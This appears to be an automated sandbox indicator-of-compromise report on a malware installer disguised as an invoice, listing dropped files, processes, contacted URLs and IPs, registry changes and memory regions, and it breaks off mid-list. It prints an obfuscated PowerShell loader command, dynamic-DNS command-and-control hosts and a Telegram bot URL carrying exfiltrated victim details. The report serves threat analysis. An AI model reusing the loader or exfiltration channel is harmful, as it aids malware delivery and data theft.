IOC Report
FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe

loading gif

Files

File Path
Type
Category
Malicious
FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\argoters\Necrotizing\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3tlzjz0.s04.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ep0gw2b4.bxh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qismeayq.oca.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usxp2am3.5r1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\Thyrididae.cyl
data
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\Unlubricating.Svb
ASCII text, with very long lines (4343), with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\Unniched.Cle
GLF_BINARY_MSB_FIRST
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\nskvrdigste.had
data
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\pin.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 702x488, components 3
dropped
C:\Users\user\AppData\Roaming\argoters\Necrotizing\termineret.for
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe
"C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Caracara136=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Unlubricating.Svb';$Restrictiveness=$Caracara136.SubString(7453,3);.$Restrictiveness($Caracara136)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.office.com/
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://www.ecosia.org/newtab/
unknown
https://reallyfreegeoip.org/xml/8.46.123.75
188.114.96.3
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
158.101.44.242
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
http://anotherarmy.dns.army:8081
unknown
https://reallyfreegeoip.org/xml/8.46.123.75$
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:01:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]
149.154.167.220
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20a
unknown
https://drive.usercontent.google.com/y8A
unknown
https://reallyfreegeoip.org
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 33 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.186.110
drive.usercontent.google.com
216.58.206.65
reallyfreegeoip.org
188.114.96.3
api.telegram.org
149.154.167.220
checkip.dyndns.com
158.101.44.242
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
188.114.96.3
reallyfreegeoip.org
European Union
142.250.186.110
drive.google.com
United States
216.58.206.65
drive.usercontent.google.com
United States
158.101.44.242
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\skoddenes\Uninstall\polypodiaceous\Excretive140
Deputeretkamret
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
C12B000
direct allocation
page execute and read and write
malicious
78AB000
remote allocation
page execute and read and write
malicious
24661000
trusted library allocation
page read and write
malicious
CB2B000
direct allocation
page execute and read and write
8C07000
heap
page read and write
2694E000
stack
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
8378000
heap
page read and write
26740000
trusted library allocation
page read and write
7F410000
trusted library allocation
page execute and read and write
246FF000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
26760000
trusted library allocation
page read and write
2589A000
trusted library allocation
page read and write
826E000
stack
page read and write
8090000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
275B0000
trusted library allocation
page execute and read and write
8B05000
heap
page read and write
2587A000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26C70000
trusted library allocation
page execute and read and write
24430000
heap
page read and write
AD0000
trusted library section
page read and write
27590000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
2567B000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
8D50000
direct allocation
page execute and read and write
269B0000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
8CD1000
heap
page read and write
23C10000
direct allocation
page read and write
26740000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
320D000
trusted library allocation
page execute and read and write
27550000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
23BF000
stack
page read and write
23C70000
direct allocation
page read and write
248D0000
trusted library allocation
page read and write
27580000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
24810000
trusted library allocation
page read and write
266B0000
trusted library allocation
page read and write
89C0000
heap
page read and write
738E000
stack
page read and write
2699D000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
24550000
trusted library allocation
page read and write
2416E000
stack
page read and write
26666000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
266F0000
trusted library allocation
page read and write
23C20000
direct allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
8318000
heap
page read and write
705E000
stack
page read and write
B14000
trusted library allocation
page read and write
A32B000
direct allocation
page execute and read and write
26C60000
trusted library allocation
page read and write
25B2C000
trusted library allocation
page read and write
23C60000
direct allocation
page read and write
26740000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
25674000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26811000
heap
page read and write
2726D000
stack
page read and write
26766000
trusted library allocation
page read and write
C70000
heap
page readonly
259C1000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
B29000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
6CF000
stack
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
2260000
heap
page read and write
27570000
trusted library allocation
page read and write
24717000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
8550000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26A97000
heap
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
27550000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
841C000
heap
page read and write
C90000
heap
page read and write
93F000
stack
page read and write
321A000
trusted library allocation
page execute and read and write
6EAB000
remote allocation
page execute and read and write
248DA000
trusted library allocation
page read and write
272AE000
stack
page read and write
B3A000
trusted library allocation
page execute and read and write
26700000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
27460000
trusted library allocation
page read and write
9B0000
direct allocation
page read and write
831E000
heap
page read and write
266D0000
trusted library allocation
page read and write
74F0000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
240AF000
stack
page read and write
248E3000
trusted library allocation
page read and write
5A69000
trusted library allocation
page read and write
277D0000
heap
page read and write
24906000
trusted library allocation
page read and write
26760000
trusted library allocation
page read and write
269A0000
trusted library allocation
page execute and read and write
72D0000
trusted library allocation
page read and write
CA0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
24947000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
2275000
heap
page read and write
8AA0000
heap
page readonly
8155000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
240ED000
stack
page read and write
26740000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
23C40000
direct allocation
page read and write
248D8000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
2FE0000
trusted library allocation
page read and write
6A9E000
stack
page read and write
24939000
trusted library allocation
page read and write
8520000
trusted library allocation
page execute and read and write
5CE000
stack
page read and write
275E0000
trusted library allocation
page read and write
8B07000
heap
page read and write
26C60000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
7FF0000
heap
page read and write
400000
unkown
page readonly
838000
stack
page read and write
26C50000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
74D000
heap
page read and write
40A000
unkown
page read and write
26C60000
trusted library allocation
page read and write
26810000
heap
page read and write
26C60000
trusted library allocation
page read and write
266A0000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
708000
heap
page read and write
269B0000
trusted library allocation
page read and write
26741000
trusted library allocation
page read and write
8C50000
heap
page read and write
2590E000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
750000
heap
page read and write
8342000
heap
page read and write
26AA0000
heap
page read and write
8474000
heap
page read and write
9C0000
direct allocation
page read and write
26740000
trusted library allocation
page read and write
275A0000
trusted library allocation
page read and write
B1D000
trusted library allocation
page execute and read and write
24814000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
570000
heap
page read and write
26740000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
24845000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
24767000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
25AEB000
trusted library allocation
page read and write
246B8000
trusted library allocation
page read and write
26C70000
trusted library allocation
page read and write
48FC000
stack
page read and write
269B0000
trusted library allocation
page read and write
27570000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
8CD1000
heap
page read and write
83E000
stack
page read and write
27450000
trusted library allocation
page execute and read and write
6BE0000
heap
page execute and read and write
26740000
trusted library allocation
page read and write
4A3B000
stack
page read and write
26C70000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
8045000
trusted library allocation
page read and write
23C50000
direct allocation
page read and write
24630000
trusted library allocation
page read and write
25769000
trusted library allocation
page read and write
27550000
trusted library allocation
page read and write
C80000
trusted library allocation
page execute and read and write
266D0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
8B07000
heap
page read and write
246C3000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
493E000
stack
page read and write
26740000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
B60000
heap
page read and write
5C0E000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
8B90000
direct allocation
page read and write
269B0000
trusted library allocation
page read and write
322B000
trusted library allocation
page execute and read and write
269B0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
27557000
trusted library allocation
page read and write
2666E000
trusted library allocation
page read and write
8C00000
heap
page read and write
248B0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
2429D000
stack
page read and write
26C60000
trusted library allocation
page read and write
8CCC000
heap
page read and write
19A000
stack
page read and write
27440000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
71FF000
heap
page read and write
26740000
trusted library allocation
page read and write
257B5000
trusted library allocation
page read and write
7091000
heap
page read and write
26740000
trusted library allocation
page read and write
246D1000
trusted library allocation
page read and write
272EE000
stack
page read and write
8BF0000
direct allocation
page read and write
26740000
trusted library allocation
page read and write
24703000
trusted library allocation
page read and write
25689000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
7F40000
trusted library allocation
page read and write
A00000
direct allocation
page read and write
266D0000
trusted library allocation
page read and write
2EEE000
stack
page read and write
73B000
heap
page read and write
8160000
trusted library allocation
page read and write
26A8A000
heap
page read and write
8C9D000
heap
page read and write
256C7000
trusted library allocation
page read and write
8D30000
direct allocation
page execute and read and write
26990000
trusted library allocation
page read and write
269EC000
heap
page read and write
259F9000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
2FF4000
trusted library allocation
page read and write
25756000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
2420000
heap
page read and write
7530000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
2666B000
trusted library allocation
page read and write
B98000
heap
page read and write
256CD000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
580000
heap
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
7480000
trusted library allocation
page read and write
49FD000
stack
page read and write
26740000
trusted library allocation
page read and write
25A17000
trusted library allocation
page read and write
26C50000
trusted library allocation
page read and write
246D6000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
5A89000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
3227000
trusted library allocation
page execute and read and write
AB0000
heap
page read and write
246AB000
trusted library allocation
page read and write
242DE000
stack
page read and write
27560000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
25B48000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26681000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
25A0A000
trusted library allocation
page read and write
4A50000
heap
page execute and read and write
2587E000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
8080000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
241AE000
stack
page read and write
23FF0000
heap
page read and write
26C60000
trusted library allocation
page read and write
26664000
trusted library allocation
page read and write
7F428000
trusted library allocation
page execute and read and write
24959000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
B68000
heap
page read and write
269B0000
trusted library allocation
page read and write
26A71000
heap
page read and write
27440000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
256BF000
trusted library allocation
page read and write
8150000
trusted library allocation
page read and write
27440000
trusted library allocation
page execute and read and write
26692000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
436000
unkown
page read and write
27590000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
408000
unkown
page readonly
2425F000
stack
page read and write
243E0000
direct allocation
page read and write
2736E000
stack
page read and write
27570000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
26764000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
248DF000
trusted library allocation
page read and write
2481A000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
244BE000
stack
page read and write
27470000
trusted library allocation
page read and write
275D0000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
9F0000
direct allocation
page read and write
26740000
trusted library allocation
page read and write
8512000
trusted library allocation
page read and write
8C5A000
heap
page read and write
266E0000
trusted library allocation
page read and write
24640000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
B07000
heap
page read and write
27440000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
27450000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
72F000
heap
page read and write
26750000
trusted library allocation
page read and write
259ED000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
241D0000
trusted library allocation
page read and write
401000
unkown
page execute read
26C60000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
8CCE000
heap
page read and write
25681000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
256EB000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
71C7000
heap
page read and write
26740000
trusted library allocation
page read and write
211E000
stack
page read and write
431000
unkown
page read and write
27580000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
244FF000
stack
page read and write
757B000
stack
page read and write
26C70000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
B00000
heap
page read and write
2F08000
heap
page read and write
269B0000
trusted library allocation
page read and write
AE0000
trusted library section
page read and write
8352000
heap
page read and write
27590000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
266C0000
heap
page read and write
27470000
trusted library allocation
page read and write
8334000
heap
page read and write
26740000
trusted library allocation
page read and write
7F04000
stack
page read and write
26750000
trusted library allocation
page read and write
7F10000
heap
page read and write
26C60000
trusted library allocation
page read and write
71B4000
heap
page read and write
72A0000
heap
page execute and read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
8530000
trusted library allocation
page execute and read and write
497E000
stack
page read and write
727F000
heap
page read and write
3216000
trusted library allocation
page execute and read and write
26C60000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
400000
unkown
page readonly
26C4E000
stack
page read and write
266D0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
2494A000
trusted library allocation
page read and write
273EE000
stack
page read and write
7060000
heap
page read and write
2F00000
heap
page read and write
275C0000
trusted library allocation
page read and write
8CEE000
stack
page read and write
42C000
unkown
page read and write
24955000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
275A0000
trusted library allocation
page read and write
8418000
heap
page read and write
26A08000
heap
page read and write
B45000
trusted library allocation
page execute and read and write
27570000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
AF0000
trusted library allocation
page read and write
8F2B000
direct allocation
page execute and read and write
2FF0000
trusted library allocation
page read and write
259FE000
trusted library allocation
page read and write
246CD000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
98000
stack
page read and write
2450000
heap
page read and write
26740000
trusted library allocation
page read and write
269F3000
heap
page read and write
266D0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
5AAB000
remote allocation
page execute and read and write
C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
2410000
heap
page read and write
2470B000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
8498000
heap
page read and write
26C60000
trusted library allocation
page read and write
247DB000
trusted library allocation
page read and write
2454000
heap
page read and write
266E0000
trusted library allocation
page read and write
243D0000
direct allocation
page read and write
27590000
trusted library allocation
page read and write
816B000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
2437E000
stack
page read and write
256D4000
trusted library allocation
page read and write
8D1E000
heap
page read and write
2583D000
trusted library allocation
page read and write
2412C000
stack
page read and write
3230000
trusted library allocation
page execute and read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
82AB000
remote allocation
page execute and read and write
A80000
heap
page read and write
7470000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
2698E000
stack
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
8D0E000
heap
page read and write
7300000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
B40000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
86A0000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
2470F000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
23C90000
direct allocation
page read and write
5A61000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
8D2B000
stack
page read and write
725F000
heap
page read and write
890000
heap
page read and write
B42000
trusted library allocation
page read and write
26660000
trusted library allocation
page read and write
2FF3000
trusted library allocation
page execute and read and write
26C60000
trusted library allocation
page read and write
27570000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
259E2000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
83D000
stack
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
24713000
trusted library allocation
page read and write
25924000
trusted library allocation
page read and write
24540000
heap
page read and write
26990000
trusted library allocation
page read and write
701E000
stack
page read and write
26C60000
trusted library allocation
page read and write
747000
heap
page read and write
740E000
stack
page read and write
26740000
trusted library allocation
page read and write
43B000
unkown
page read and write
4BB6000
trusted library allocation
page read and write
49BE000
stack
page read and write
26740000
trusted library allocation
page read and write
833E000
heap
page read and write
26740000
trusted library allocation
page read and write
259CE000
trusted library allocation
page read and write
43E000
unkown
page read and write
256E3000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
27580000
trusted library allocation
page read and write
26672000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
27570000
trusted library allocation
page read and write
24953000
trusted library allocation
page read and write
2486E000
trusted library allocation
page read and write
24A91000
trusted library allocation
page read and write
5C08000
trusted library allocation
page read and write
8CC5000
heap
page read and write
27430000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
24650000
heap
page execute and read and write
2270000
heap
page read and write
26C70000
trusted library allocation
page read and write
259F4000
trusted library allocation
page read and write
B13000
trusted library allocation
page execute and read and write
259DB000
trusted library allocation
page read and write
451000
unkown
page readonly
970000
heap
page read and write
26740000
trusted library allocation
page read and write
86C0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
24340000
remote allocation
page read and write
26740000
trusted library allocation
page read and write
48A8000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
44D0000
remote allocation
page execute and read and write
26C60000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
9A0000
direct allocation
page read and write
7190000
heap
page read and write
8B00000
heap
page read and write
25933000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
25661000
trusted library allocation
page read and write
25850000
trusted library allocation
page read and write
26741000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
256E0000
trusted library allocation
page read and write
2471B000
trusted library allocation
page read and write
5DC000
stack
page read and write
26990000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
8310000
heap
page read and write
26990000
trusted library allocation
page read and write
834E000
heap
page read and write
980000
direct allocation
page read and write
266E0000
trusted library allocation
page read and write
B8C000
heap
page read and write
26C60000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
2732E000
stack
page read and write
2742E000
stack
page read and write
243BF000
stack
page read and write
24765000
trusted library allocation
page read and write
24477000
stack
page read and write
269B0000
trusted library allocation
page read and write
7F20000
trusted library allocation
page execute and read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
7460000
trusted library allocation
page execute and read and write
8167000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
46AB000
remote allocation
page execute and read and write
C03000
heap
page read and write
72C7000
trusted library allocation
page read and write
25740000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
25A79000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
24340000
remote allocation
page read and write
26C60000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
25A43000
trusted library allocation
page read and write
258AF000
trusted library allocation
page read and write
8D40000
trusted library allocation
page execute and read and write
269B0000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
25828000
trusted library allocation
page read and write
723A000
heap
page read and write
26740000
trusted library allocation
page read and write
23C80000
direct allocation
page read and write
26C60000
trusted library allocation
page read and write
9D0000
direct allocation
page read and write
26740000
trusted library allocation
page read and write
BDC000
heap
page read and write
221F000
stack
page read and write
269B0000
trusted library allocation
page read and write
9E0000
direct allocation
page read and write
833A000
heap
page read and write
246FB000
